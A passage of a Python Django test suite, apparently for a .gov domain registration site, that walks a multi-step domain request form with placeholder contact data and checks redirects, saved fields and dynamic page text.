\"/register/authorizing_official/\")\n num_pages_tested += 1\n\n # ---- AUTHORIZING OFFICIAL PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n ao_form = ao_page.forms[0]\n ao_form[\"authorizing_official-first_name\"] = \"Testy ATO\"\n ao_form[\"authorizing_official-last_name\"] = \"Tester ATO\"\n ao_form[\"authorizing_official-title\"] = \"Chief Tester\"\n ao_form[\"authorizing_official-email\"] = \"testy@town.com\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_result = ao_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.authorizing_official.first_name, \"Testy ATO\")\n self.assertEqual(application.authorizing_official.last_name, \"Tester ATO\")\n self.assertEqual(application.authorizing_official.title, \"Chief Tester\")\n self.assertEqual(application.authorizing_official.email, \"testy@town.com\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(ao_result.status_code, 302)\n self.assertEqual(ao_result[\"Location\"], \"/register/current_sites/\")\n num_pages_tested += 1\n\n # ---- CURRENT SITES PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_page = ao_result.follow()\n current_sites_form = current_sites_page.forms[0]\n current_sites_form[\"current_sites-0-website\"] = \"www.city.com\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_result = current_sites_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(\n application.current_websites.filter(website=\"http://www.city.com\").count(),\n 1,\n )\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(current_sites_result.status_code, 302)\n self.assertEqual(current_sites_result[\"Location\"], \"/register/dotgov_domain/\")\n num_pages_tested += 1\n\n # ---- DOTGOV DOMAIN PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page = current_sites_result.follow()\n dotgov_form = dotgov_page.forms[0]\n dotgov_form[\"dotgov_domain-requested_domain\"] = \"city\"\n dotgov_form[\"dotgov_domain-0-alternative_domain\"] = \"city1\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_result = dotgov_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.requested_domain.name, \"city.gov\")\n self.assertEqual(application.alternative_domains.filter(website=\"city1.gov\").count(), 1)\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(dotgov_result.status_code, 302)\n self.assertEqual(dotgov_result[\"Location\"], \"/register/purpose/\")\n num_pages_tested += 1\n\n # ---- PURPOSE PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n purpose_page = dotgov_result.follow()\n purpose_form = purpose_page.forms[0]\n purpose_form[\"purpose-purpose\"] = \"For all kinds of things.\"\n\n # test next button\n 
self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n purpose_result = purpose_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.purpose, \"For all kinds of things.\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(purpose_result.status_code, 302)\n self.assertEqual(purpose_result[\"Location\"], \"/register/your_contact/\")\n num_pages_tested += 1\n\n # ---- YOUR CONTACT INFO PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n your_contact_page = purpose_result.follow()\n your_contact_form = your_contact_page.forms[0]\n\n your_contact_form[\"your_contact-first_name\"] = \"Testy you\"\n your_contact_form[\"your_contact-last_name\"] = \"Tester you\"\n your_contact_form[\"your_contact-title\"] = \"Admin Tester\"\n your_contact_form[\"your_contact-email\"] = \"testy-admin@town.com\"\n your_contact_form[\"your_contact-phone\"] = \"(201) 555 5556\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n your_contact_result = your_contact_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.submitter.first_name, \"Testy you\")\n self.assertEqual(application.submitter.last_name, \"Tester you\")\n self.assertEqual(application.submitter.title, \"Admin Tester\")\n self.assertEqual(application.submitter.email, \"testy-admin@town.com\")\n self.assertEqual(application.submitter.phone, \"(201) 555 5556\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(your_contact_result.status_code, 302)\n self.assertEqual(your_contact_result[\"Location\"], \"/register/other_contacts/\")\n num_pages_tested += 1\n\n # ---- OTHER CONTACTS PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n other_contacts_page = your_contact_result.follow()\n other_contacts_form = other_contacts_page.forms[0]\n\n other_contacts_form[\"other_contacts-0-first_name\"] = \"Testy2\"\n other_contacts_form[\"other_contacts-0-last_name\"] = \"Tester2\"\n other_contacts_form[\"other_contacts-0-title\"] = \"Another Tester\"\n other_contacts_form[\"other_contacts-0-email\"] = \"testy2@town.com\"\n other_contacts_form[\"other_contacts-0-phone\"] = \"(201) 555 5557\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n other_contacts_result = other_contacts_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(\n application.other_contacts.filter(\n first_name=\"Testy2\",\n last_name=\"Tester2\",\n title=\"Another Tester\",\n email=\"testy2@town.com\",\n phone=\"(201) 555 5557\",\n ).count(),\n 1,\n )\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(other_contacts_result.status_code, 302)\n self.assertEqual(other_contacts_result[\"Location\"], \"/register/anything_else/\")\n num_pages_tested += 1\n\n # ---- ANYTHING ELSE PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n anything_else_page = other_contacts_result.follow()\n anything_else_form = anything_else_page.forms[0]\n\n 
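        # Note the "<step>-<field>" naming used on each wizard form (e.g.
        # "anything_else-anything_else" just below): every step's Django form is
        # prefixed with the step name. A tiny illustration, with a hypothetical
        # helper name:
        #
        # def _prefixed_field(step, field):
        #     # Mirrors the form-prefix convention visible throughout these tests.
        #     return "%s-%s" % (step, field)
        #
        # _prefixed_field("anything_else", "anything_else")  # "anything_else-anything_else"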
anything_else_form[\"anything_else-anything_else\"] = \"Nothing else.\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n anything_else_result = anything_else_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.anything_else, \"Nothing else.\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(anything_else_result.status_code, 302)\n self.assertEqual(anything_else_result[\"Location\"], \"/register/requirements/\")\n num_pages_tested += 1\n\n # ---- REQUIREMENTS PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n requirements_page = anything_else_result.follow()\n requirements_form = requirements_page.forms[0]\n\n requirements_form[\"requirements-is_policy_acknowledged\"] = True\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n requirements_result = requirements_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.is_policy_acknowledged, True)\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(requirements_result.status_code, 302)\n self.assertEqual(requirements_result[\"Location\"], \"/register/review/\")\n num_pages_tested += 1\n\n # ---- REVIEW AND FINISHED PAGES ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n review_page = requirements_result.follow()\n review_form = review_page.forms[0]\n\n # Review page contains all the previously entered data\n # Let's make sure the long org name is displayed\n self.assertContains(review_page, \"Federal: an agency of the U.S. government\")\n self.assertContains(review_page, \"Executive\")\n self.assertContains(review_page, \"Testorg\")\n self.assertContains(review_page, \"address 1\")\n self.assertContains(review_page, \"address 2\")\n self.assertContains(review_page, \"NYC\")\n self.assertContains(review_page, \"NY\")\n self.assertContains(review_page, \"10002\")\n self.assertContains(review_page, \"URB Royal Oaks\")\n self.assertContains(review_page, \"Testy ATO\")\n self.assertContains(review_page, \"Tester ATO\")\n self.assertContains(review_page, \"Chief Tester\")\n self.assertContains(review_page, \"testy@town.com\")\n self.assertContains(review_page, \"city.com\")\n self.assertContains(review_page, \"city.gov\")\n self.assertContains(review_page, \"city1.gov\")\n self.assertContains(review_page, \"For all kinds of things.\")\n self.assertContains(review_page, \"Testy you\")\n self.assertContains(review_page, \"Tester you\")\n self.assertContains(review_page, \"Admin Tester\")\n self.assertContains(review_page, \"testy-admin@town.com\")\n self.assertContains(review_page, \"(201) 555-5556\")\n self.assertContains(review_page, \"Testy2\")\n self.assertContains(review_page, \"Tester2\")\n self.assertContains(review_page, \"Another Tester\")\n self.assertContains(review_page, \"testy2@town.com\")\n self.assertContains(review_page, \"(201) 555-5557\")\n self.assertContains(review_page, \"Nothing else.\")\n\n # We can't test the modal itself as it relies on JS for init and triggering,\n # but we can test for the existence of its trigger:\n self.assertContains(review_page, \"toggle-submit-domain-request\")\n # And the existence of the modal's data parked and ready for the js init.\n # The next assert also tests for the passed requested domain context from\n # the view > application_form > modal\n self.assertContains(review_page, \"You are about to submit a domain request for city.gov\")\n\n # final submission results in a redirect to the \"finished\" URL\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise():\n review_result = review_form.submit()\n\n self.assertEqual(review_result.status_code, 302)\n self.assertEqual(review_result[\"Location\"], \"/register/finished/\")\n num_pages_tested += 1\n\n # following this redirect is a GET request, so include the cookie\n # here too.\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise():\n final_result = review_result.follow()\n self.assertContains(final_result, \"Thanks for your domain request!\")\n\n # check that any new pages are added to this test\n self.assertEqual(num_pages, num_pages_tested)\n\n # This is the start of a test to check an existing application; it currently\n # does not work and results in errors as noted in:\n # https://github.com/cisagov/getgov/pull/728\n @skip(\"WIP\")\n def test_application_form_started_allsteps(self):\n num_pages_tested = 0\n # elections, type_of_work, tribal_government, no_other_contacts\n SKIPPED_PAGES = 4\n DASHBOARD_PAGE = 1\n num_pages = len(self.TITLES) - SKIPPED_PAGES + DASHBOARD_PAGE\n\n application = completed_application(user=self.user)\n application.save()\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n self.assertContains(home_page, \"Started\")\n num_pages_tested += 1\n\n # TODO: For some reason this click results in a new application being generated\n # This approach is an alternative to using get as is being done below\n #\n # type_page = home_page.click(\"Edit\")\n\n session_id = 
self.app.cookies[settings.SESSION_COOKIE_NAME]\n url = reverse(\"edit-application\", kwargs={\"id\": application.pk})\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n\n # TODO: The following line results in a django error on middleware\n response = self.client.get(url, follow=True)\n self.assertContains(response, \"Type of organization\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # TODO: Step through the remaining pages\n\n self.assertEqual(num_pages, num_pages_tested)\n\n def test_application_form_conditional_federal(self):\n \"\"\"Federal branch question is shown for federal organizations.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n\n # the conditional step titles shouldn't appear initially\n self.assertNotContains(type_page, self.TITLES[\"organization_federal\"])\n self.assertNotContains(type_page, self.TITLES[\"organization_election\"])\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n\n # set the session ID before .submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # the post request should return a redirect to the federal branch\n # question\n self.assertEqual(type_result.status_code, 302)\n self.assertEqual(type_result[\"Location\"], \"/register/organization_federal/\")\n\n # and the step label should appear in the sidebar of the resulting page\n # but the step label for the elections page should not appear\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n self.assertContains(federal_page, self.TITLES[\"organization_federal\"])\n self.assertNotContains(federal_page, self.TITLES[\"organization_election\"])\n\n # continuing on in the flow we need to see top-level agency on the\n # contact page\n federal_page.forms[0][\"organization_federal-federal_type\"] = \"executive\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_page.forms[0].submit()\n # the post request should return a redirect to the contact\n # question\n self.assertEqual(federal_result.status_code, 302)\n self.assertEqual(federal_result[\"Location\"], \"/register/organization_contact/\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = federal_result.follow()\n self.assertContains(contact_page, \"Federal agency\")\n\n def test_application_form_conditional_elections(self):\n \"\"\"Election question is shown for other organizations.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". 
We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n\n # the conditional step titles shouldn't appear initially\n self.assertNotContains(type_page, self.TITLES[\"organization_federal\"])\n self.assertNotContains(type_page, self.TITLES[\"organization_election\"])\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"county\"\n\n # set the session ID before .submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # the post request should return a redirect to the elections question\n self.assertEqual(type_result.status_code, 302)\n self.assertEqual(type_result[\"Location\"], \"/register/organization_election/\")\n\n # and the step label should appear in the sidebar of the resulting page\n # but the step label for the elections page should not appear\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_page = type_result.follow()\n self.assertContains(election_page, self.TITLES[\"organization_election\"])\n self.assertNotContains(election_page, self.TITLES[\"organization_federal\"])\n\n # continuing on in the flow we need to NOT see top-level agency on the\n # contact page\n election_page.forms[0][\"organization_election-is_election_board\"] = \"True\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_result = election_page.forms[0].submit()\n # the post request should return a redirect to the contact\n # question\n self.assertEqual(election_result.status_code, 302)\n self.assertEqual(election_result[\"Location\"], \"/register/organization_contact/\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = election_result.follow()\n self.assertNotContains(contact_page, \"Federal agency\")\n\n def test_application_form_section_skipping(self):\n \"\"\"Can skip forward and back in sections\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n\n # Now on federal type page, click back to the organization type\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n new_page = federal_page.click(str(self.TITLES[\"organization_type\"]), index=0)\n\n # Should be a link to the organization_federal page\n self.assertGreater(\n len(new_page.html.find_all(\"a\", href=\"/register/organization_federal/\")),\n 0,\n )\n\n def test_application_form_nonfederal(self):\n \"\"\"Non-federal organizations don't have to provide their federal agency.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". 
We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.INTERSTATE\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = type_result.follow()\n org_contact_form = contact_page.forms[0]\n\n self.assertNotIn(\"federal_agency\", org_contact_form.fields)\n\n # minimal fields that must be filled out\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_result = org_contact_form.submit()\n\n # the post request should return a redirect to the\n # about your organization page if it was successful.\n self.assertEqual(contact_result.status_code, 302)\n self.assertEqual(contact_result[\"Location\"], \"/register/about_your_organization/\")\n\n def test_application_about_your_organization_special(self):\n \"\"\"Special districts have to answer an additional question.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.SPECIAL_DISTRICT\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_page.forms[0].submit()\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = type_result.follow()\n\n self.assertContains(contact_page, self.TITLES[Step.ABOUT_YOUR_ORGANIZATION])\n\n def test_application_no_other_contacts(self):\n \"\"\"Applicants with no other contacts have to give a reason.\"\"\"\n contacts_page = self.app.get(reverse(\"application:other_contacts\"))\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". 
We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n result = contacts_page.forms[0].submit()\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n no_contacts_page = result.follow()\n expected_url_slug = str(Step.NO_OTHER_CONTACTS)\n actual_url_slug = no_contacts_page.request.path.split(\"/\")[-2]\n self.assertEqual(expected_url_slug, actual_url_slug)\n\n def test_application_about_your_organization_interstate(self):\n \"\"\"Interstate organizations have to answer an additional question.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.INTERSTATE\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = type_result.follow()\n\n self.assertContains(contact_page, self.TITLES[Step.ABOUT_YOUR_ORGANIZATION])\n\n def test_application_tribal_government(self):\n \"\"\"Tribal organizations have to answer an additional question.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.TRIBAL\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n # the tribal government page comes immediately afterwards\n self.assertIn(\"/tribal_government\", type_result.headers[\"Location\"])\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n tribal_government_page = type_result.follow()\n\n # and the step is on the sidebar list.\n self.assertContains(tribal_government_page, self.TITLES[Step.TRIBAL_GOVERNMENT])\n\n def test_application_ao_dynamic_text(self):\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". 
We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # ---- FEDERAL BRANCH PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n federal_form = federal_page.forms[0]\n federal_form[\"organization_federal-federal_type\"] = \"executive\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_form.submit()\n\n # ---- ORG CONTACT PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_page = federal_result.follow()\n org_contact_form = org_contact_page.forms[0]\n # federal agency so we have to fill in federal_agency\n org_contact_form[\"organization_contact-federal_agency\"] = \"General Services Administration\"\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-address_line2\"] = \"address 2\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n org_contact_form[\"organization_contact-urbanization\"] = \"URB Royal Oaks\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_result = org_contact_form.submit()\n\n # ---- AO CONTACT PAGE ----\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n self.assertContains(ao_page, \"Executive branch federal agencies\")\n\n # Go back to organization type page and change type\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page.click(str(self.TITLES[\"organization_type\"]), index=0)\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_form[\"organization_type-organization_type\"] = \"city\"\n type_result = type_form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_page = type_result.follow()\n\n # Go back to AO page and test the dynamic text changed\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = election_page.click(str(self.TITLES[\"authorizing_official\"]), index=0)\n self.assertContains(ao_page, \"Domain requests from cities\")\n\n def test_application_dotgov_domain_dynamic_text(self):\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". 
We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n # ---- TYPE PAGE ----\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # ---- FEDERAL BRANCH PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n federal_form = federal_page.forms[0]\n federal_form[\"organization_federal-federal_type\"] = \"executive\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_form.submit()\n\n # ---- ORG CONTACT PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_page = federal_result.follow()\n org_contact_form = org_contact_page.forms[0]\n # federal agency so we have to fill in federal_agency\n org_contact_form[\"organization_contact-federal_agency\"] = \"General Services Administration\"\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-address_line2\"] = \"address 2\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n org_contact_form[\"organization_contact-urbanization\"] = \"URB Royal Oaks\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_result = org_contact_form.submit()\n\n # ---- AO CONTACT PAGE ----\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n\n # ---- AUTHORIZING OFFICIAL PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n ao_form = ao_page.forms[0]\n ao_form[\"authorizing_official-first_name\"] = \"Testy ATO\"\n ao_form[\"authorizing_official-last_name\"] = \"Tester ATO\"\n ao_form[\"authorizing_official-title\"] = \"Chief Tester\"\n ao_form[\"authorizing_official-email\"] = \"testy@town.com\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_result = ao_form.submit()\n\n # ---- CURRENT SITES PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_page = ao_result.follow()\n current_sites_form = current_sites_page.forms[0]\n current_sites_form[\"current_sites-0-website\"] = \"www.city.com\"\n\n # test saving the page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_result = current_sites_form.submit()\n\n # ---- DOTGOV DOMAIN PAGE ----\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page = current_sites_result.follow()\n\n self.assertContains(dotgov_page, \"medicare.gov\")\n\n # Go back to organization type page and change type\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page.click(str(self.TITLES[\"organization_type\"]), index=0)\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_form[\"organization_type-organization_type\"] = \"city\"\n type_result = type_form.submit()\n 
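        # The fill-and-submit walk repeated across these dynamic-text tests
        # could, in principle, be table-driven. A rough, untested sketch (the
        # step/field table below is illustrative, not this suite's API):
        #
        # STEPS = [
        #     ("organization_type", {"organization_type-organization_type": "federal"}),
        #     ("organization_federal", {"organization_federal-federal_type": "executive"}),
        # ]
        # page = self.app.get(reverse("application:")).follow()
        # for _step, fields in STEPS:
        #     form = page.forms[0]
        #     for name, value in fields.items():
        #         form[name] = value
        #     self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)
        #     page = form.submit().follow()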
self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_page = type_result.follow()\n\n # Go back to dotgov domain page to test the dynamic text changed\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page = election_page.click(str(self.TITLES[\"dotgov_domain\"]), index=0)\n self.assertContains(dotgov_page, \"CityofEudoraKS.gov\")\n self.assertNotContains(dotgov_page, \"medicare.gov\")\n\n def test_application_formsets(self):\n \"\"\"Users are able to add more than one of some fields.\"\"\"\n current_sites_page = self.app.get(reverse(\"application:current_sites\"))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n # fill in the form field\n current_sites_form = current_sites_page.forms[0]\n self.assertIn(\"current_sites-0-website\", current_sites_form.fields)\n self.assertNotIn(\"current_sites-1-website\", current_sites_form.fields)\n current_sites_form[\"current_sites-0-website\"] = \"https://example.com\"\n\n # click \"Add another\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_result = current_sites_form.submit(\"submit_button\", value=\"save\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_form = current_sites_result.follow().forms[0]\n\n # verify that there are two form fields\n value = current_sites_form[\"current_sites-0-website\"].value\n self.assertEqual(value, \"https://example.com\")\n self.assertIn(\"current_sites-1-website\", current_sites_form.fields)\n # and it is correctly referenced in the ManyToOne relationship\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(\n application.current_websites.filter(website=\"https://example.com\").count(),\n 1,\n )\n\n @skip(\"WIP\")\n def test_application_edit_restore(self):\n \"\"\"\n Test that a previously saved application is available at the /edit endpoint.\n \"\"\"\n ao, _ = Contact.objects.get_or_create(\n first_name=\"Testy\",\n last_name=\"Tester\",\n title=\"Chief Tester\",\n email=\"testy@town.com\",\n phone=\"(555) 555 5555\",\n )\n domain, _ = Domain.objects.get_or_create(name=\"city.gov\")\n alt, _ = Website.objects.get_or_create(website=\"city1.gov\")\n current, _ = Website.objects.get_or_create(website=\"city.com\")\n you, _ = Contact.objects.get_or_create(\n first_name=\"Testy you\",\n last_name=\"Tester you\",\n title=\"Admin Tester\",\n email=\"testy-admin@town.com\",\n phone=\"(555) 555 5556\",\n )\n other, _ = Contact.objects.get_or_create(\n first_name=\"Testy2\",\n last_name=\"Tester2\",\n title=\"Another Tester\",\n email=\"testy2@town.com\",\n phone=\"(555) 555 5557\",\n )\n application, _ = DomainApplication.objects.get_or_create(\n 